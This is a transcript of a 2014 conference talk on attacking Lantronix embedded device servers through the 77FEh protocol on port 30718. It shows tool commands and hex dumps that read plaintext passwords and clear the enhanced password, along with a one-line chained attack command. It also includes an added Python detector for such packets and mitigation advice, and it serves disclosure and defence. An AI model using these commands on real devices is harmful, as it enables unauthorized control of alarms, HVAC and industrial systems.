Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014
Transcript of Getting access to Lantronix devices: exploring treasures of 77FEh at Confidence 2014
Confidence 2014
Getting access to Lantronix devices: Exploring treasures of 77FEh
Vlatko Kosturjak, Diverto, @k0st
Who are you!?!!??
Security Jedi at Diverto, bringing balance to the force
Experience:
Offensive (Penetration tester)
Defensive (Developer/System Administrator/...)
Have code in: Nmap, Metasploit, OpenVAS, ...
Author of free software: https://github.com/kost/
If you trust in certificates: CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
Agenda
Introduction - Lantronix
Physical access
WTF is 77FEh?
Vulnerabilities & Exploitation
Recommendations
Questions and answers
45 minutes
Lantronix
Source: www.lantronix.com
You can find them as integral part of
Alarms
HVACs
Pool monitoring systems
Sprinkler controllers
Hacked vacuum cleaners - Roombas
Embedded systems
Industrial systems
Source:http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsArticle_Print&ID=904147&highlight
What are they actually running?
OS: CoBos (mostly)
Evolution OS/Linux
ThreadX
Linux
Support: 1 or more serial ports
Modbus (few models)
10/100 Ethernet
Physical access
Like usual: Game over
Serial access: No password by design
Requirements: Standard TTL cable
BusPirate
...
Connecting to serial port...
9600 bps 8/N/1
Flow control: None
Most frequent TCP/IP services available
Web (tcp/80)
Telnet (tcp/9999)
77FEh (tcp-udp/30718)
SNMP (udp/161)
Telnet administration interface: What is this? Mostly information disclosures
Simple web server: Serving applet JAR which talks to port 30718
Device Discovery
Ask :)
Look if you have physical access
Passive
Active/Scanning: Standard port scanning is fine with conservative timing
Broadcast UDP to specific Lantronix ports (30718)
Beware: Version scanning (-sV) or running vulnerability scanners may misconfigure the device
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
So, WTF is 77FEh finally?
0x77FE = 30718 (decimal)
TCP/UDP protocol for device setup; proprietary protocol
Used by DeviceInstaller (proprietary software from Lantronix)
Designed for: Setup of device
Administration of device
Getting device info
Insecurity (sorry, had to write it, you'll see later ;) )
Sample 77FEh communication
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q
[v] Sending 4 bytes:
0x00000000 (00000) 000000f6 ....
[v] Received 30 bytes:
0x00000000 (00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
0x00000010 (00016) 62a7d944 00000000 00204a91 84fb b..D..... J...
Query setup request (4); Query setup response (4); MAC address of the device (6); Device type
Interesting request #1
[v] Sending 4 bytes:
0x00000000 (00000) 000000f8 ....
[v] Received 124 bytes:
0x00000000 (00000) 000000f9 c0a809c9 00000000 54455354 ............TEST
0x00000010 (00016) c0a80905 4c020000 141e141e 0a0a0a0a ....L...........
0x00000020 (00032) cc070000 00000000 00000000 00000000 ................
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 ............
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -P
Query setup (4); Simple password in plaintext (4); IPv4 (4)
Previous work
Metasploit: Rob Vinson, http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
https://github.com/robvinson/metasploit-modules
Metasploit modules for simple passwords by jgor: http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
Tools: Simple C program by jgor, https://github.com/jgor/lantronix-telnet-pw
But...
Simple password is not set
Device still asks for password
Further digging: Enhanced password in place
You cannot get/reset the enhanced password easily
Length is bigger (4 -> 16)
Challenge!!!
Introduction to enhanced passwords
Source: Lantronix documentation
Feature/Type            Simple Password   Enhanced Password
Length                  4                 16
Visible in query setup  yes               no
Source: Mohdafri.com
Interesting request - #2
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -C
[v] Sending 4 bytes:
0x00000000 (00000) 000000f4 ....
[v] Received 32 bytes:
0x00000000 (00000) 000000f5 09040000 00000000 54455354 ............TEST
0x00000010 (00016) 352e382e 382e3300 00000000 00000000 5.8.8.3.........
0x00000020 (00032)
Query ext version request (4); Simple password in plaintext (4); Version (6)
Interesting request #3
Request to query configuration: 000000eX
Response to query configuration: 000000bX, followed by 126 bytes of setup
X = number of the setup record (0-F):
0 basic setup record (simple password, IP, ...)
1 security record (enhanced password, AES key, SNMP, ...)
2 specific products / situations
3 OEMs
...
Wrong! Request for security record 1 provides just zero bytes!
Interesting request #4
Request to change configuration: 000000cX, followed by 126 bytes of setup
Response to change configuration: 000000bX
X = number of the setup record (0-F):
0 basic setup record
1 security record
2 specific products / situations
3 OEMs
Setting setup record 1 for security
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -E
[v] Sending 130 bytes:
0x00000000 (00000) 000000c1 00000000 00000000 00000000 ................
0x00000010 (00016) 00000000 00000000 00000000 00000000 ................
0x00000020 (00032) 00000000 00007075 626c6963 00000000 ......public....
0x00000030 (00048) 00000000 00000000 00000000 00000000 ................
0x00000040 (00064) 00000000 00000000 00000000 00000000 ................
0x00000050 (00080) 00000000 00000000 00000000 00000000 ................
0x00000060 (00096) 00000000 00000000 00000000 00000000 ................
0x00000070 (00112) 00000000 00000000 00000000 00000000 ................
0x00000080 (00128) 0000 ..
[v] Received 4 bytes:
0x00000000 (00000) 000000b1 ....
Set setup record 1 (security) request; SNMP community string (13); Enhanced password (16)
Setting setup record 1 was successful
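Added example, not part of the talk or of lantronix-witchcraft: a passive classifier for 77FEh (tcp/udp 30718) payloads that uses only the message codes shown on the slides (0xF6/F7, 0xF8/F9, 0xF4/F5, 0xEX, 0xCX, 0xBX) and the 126-byte setup body, so that a capture on port 30718 can be checked for configuration-change requests like the one above. The severity ratings are this example's own assumptions.

```python
SETUP_BODY_LEN = 126  # bytes of setup following the 4-byte code (per the slides)

# Setup record numbers as described on the slides (low nibble of 0xEX/0xCX/0xBX)
RECORD_NAMES = {
    0: "basic setup (simple password, IP, ...)",
    1: "security (enhanced password, AES key, SNMP, ...)",
    2: "product/situation specific",
    3: "OEM",
}

# Fixed 4-byte codes from the captures: code -> (kind, severity, note).
# Severity ratings are this example's own, not Lantronix's.
FIXED_CODES = {
    0xF6: ("query-setup request", "info", "device discovery"),
    0xF7: ("query-setup response", "info", "MAC address and device type"),
    0xF4: ("query-ext-version request", "info", "firmware version probe"),
    0xF5: ("query-ext-version response", "info", "firmware version"),
    0xF8: ("query-setup-with-password request", "medium",
           "asks the device for its simple password"),
    0xF9: ("query-setup-with-password response", "medium",
           "simple password and IPv4 leave the device in plaintext"),
}

def classify_77fe(payload: bytes) -> dict:
    """Classify one port-30718 payload: kind, setup record, severity, note."""
    if len(payload) < 4 or payload[:3] != b"\x00\x00\x00":
        return {"kind": "not-77feh", "record": None, "severity": "none", "note": ""}
    code = payload[3]
    if code in FIXED_CODES:
        kind, sev, note = FIXED_CODES[code]
        return {"kind": kind, "record": None, "severity": sev, "note": note}
    family, record = code & 0xF0, code & 0x0F
    rec_name = RECORD_NAMES.get(record, "record %d" % record)
    if family == 0xE0:   # 000000eX: read setup record X
        return {"kind": "query-config request", "record": record, "severity": "medium",
                "note": "reads setup record %d: %s" % (record, rec_name)}
    if family == 0xC0:   # 000000cX + 126 bytes: rewrite setup record X
        body_ok = len(payload) == 4 + SETUP_BODY_LEN
        return {"kind": "change-config request", "record": record, "severity": "high",
                "note": "rewrites setup record %d: %s%s"
                % (record, rec_name, "" if body_ok else " (truncated body)")}
    if family == 0xB0:   # 000000bX: 4-byte change ack, or 4 + 126 bytes of setup
        if len(payload) == 4:
            return {"kind": "change-config ack", "record": record, "severity": "medium",
                    "note": "device accepted a change to setup record %d" % record}
        return {"kind": "query-config response", "record": record, "severity": "medium",
                "note": "contents of setup record %d left the device" % record}
    return {"kind": "unknown 77feh code 0x%02x" % code, "record": None,
            "severity": "low", "note": "code not described on the slides"}
```

A change-config request to record 1 is the one to alert on: it is the message that clears the enhanced password and AES key.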
Enhanced password gone: no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
Authentication Algorithm Guess
Authenticate:
Enhanced password set -> Ask for enhanced password
Enhanced password not set, simple password set -> Ask for simple password
Enhanced password not set, simple password not set -> Display setup menu
Password OK -> Display setup menu
New tool: lantronix-witchcraft
77FEh protocol implementation
77FEh security related utility
All the tricks mentioned implemented
Free software: GPL2
Requirement: Perl
Available at https://github.com/kost/lantronix-witchcraft
Basic usage:
Display MAC address: ./lantronix-witchcraft.pl -Q
Display simple password (up to 4 characters): ./lantronix-witchcraft.pl -P
Reset security record (together with enhanced password): ./lantronix-witchcraft.pl -E
Reset security record without AES (with enhanced password): ./lantronix-witchcraft.pl -S
Dump setup records: ./lantronix-witchcraft.pl -G -D
Brave enough?
One command to rule them all
Display Mac address and simple password, dump setup records, reset security records together with enhanced password:
./lantronix-witchcraft.pl -C -Q -P -E -G -D
Still wondering why automatic scanning is bad for Lantronix?
Dump of setup record:
00000030 00 1c 00 03 00 4e 00 53 00 50 00 6c 00 61 00 79 |.....N.S.P.l.a.y|
00000040 00 65 00 72 00 2f 00 39 00 2e 00 30 00 2e 00 30 |.e.r./.9...0...0|
00000050 00 2e 00 32 00 39 00 38 00 30 00 3b 00 20 00 7b |...2.9.8.0.;. .{|
00000060 00 30 00 30 00 30 00 30 00 41 00 41 00 30 00 30 |.0.0.0.0.A.A.0.0|
00000070 00 2d 00 30 00 41 00 30 00 30 00 2d 00 30 02 ff |.-.0.A.0.0.-.0..|
Correct way
Ask: Someone responsible, whether they could have something like that
Send broadcast query packet to 77FEh
Identify ports 30718 open (TCP or UDP)
Dump setup records
Play ;)
Check if it is still working... If yes, perfect
If not: huh, but you should restore the setup records somehow ;)
It's not about Lantronix...
...they warned the vendors about it in their documentation
Source: Lantronix documentation
Disclosure Problem
It's more about vendors who implement Lantronix in their devices
Whom to report to? Lantronix: I guess they know their protocol ;)
OEMs: hard to find all their customers ;)
Awareness: Conference
Tools
But maybe it could be done...
Add white list
Encryption/SSL?
Source: Lantronix documentation
Recommendations
Have some other device to VPN/SSL tunnel the services
Telnet only through VPN or other secure channel to administration interface
Disable 77FEh if not needed
Filter out 77FEh on network devices to only allowed ones
Disable other unnecessary services (SNMP, telnet, etc.)
Summary
There are ways to get past authentication (if 77FEh is enabled):
Simple passwords
Enhanced passwords
Tools: Metasploit Lantronix modules
https://github.com/kost/lantronix-witchcraft
Recommendations: Disable 77FEh if not needed, or filter out 77FEh on network devices to only allowed ones
Tunnel all communication to these devices over VPN/SSL
Future: There are things to research, for example a way to obtain the enhanced password or AES keys
Acknowledgements - Thanks
Previous work (Simple Passwords): Rob Vinson, http://robvinson.org/blog/2012/07/08/lantronix-serial-to-ethernet/
https://github.com/robvinson/metasploit-modules
Metasploit modules for simple passwords by jgor: http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_password
http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lantronix_telnet_version
https://github.com/jgor/lantronix-telnet-pw
Colleagues: Dalibor Dosegovi, hardware wizard
Thank you!
Questions and Answers: @k0st
MosEisleyLab